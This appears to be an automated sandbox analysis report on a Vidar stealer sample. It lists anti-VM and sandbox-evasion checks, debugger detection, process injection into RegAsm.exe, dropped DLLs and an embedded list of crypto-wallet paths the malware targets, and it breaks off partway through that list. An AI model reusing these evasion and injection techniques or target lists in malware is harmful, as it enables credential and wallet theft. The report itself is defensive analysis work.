Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4EC0000 memory reserve \| memory write watch	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 6.7 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410220 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410352h

3_2_00410220

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_00416310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004173B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040AF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00416FA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

3_2_00416750

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004103F0 GetSystemInfo,wsprintfA,

3_2_004103F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1976459689.000000000161D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware8[6
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041A2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0041A2BF

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004181D0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410050 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,

3_2_00410050

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A2BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F398 SetUnhandledExceptionFilter,	3_2_0041F398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B7E7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041B7E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C70B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C70B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C92AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C92AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "FreeConsole")
Source: file.exe, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(text.ToLower()), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02EC2111 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_02EC2111

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411A90 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_00411A90

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1175008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C70B341 cpuid

3_2_6C70B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		3_2_00410220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,		3_2_00410299

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410150 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

3_2_00410150

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004100D0 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_004100D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004101B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_004101B0

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local 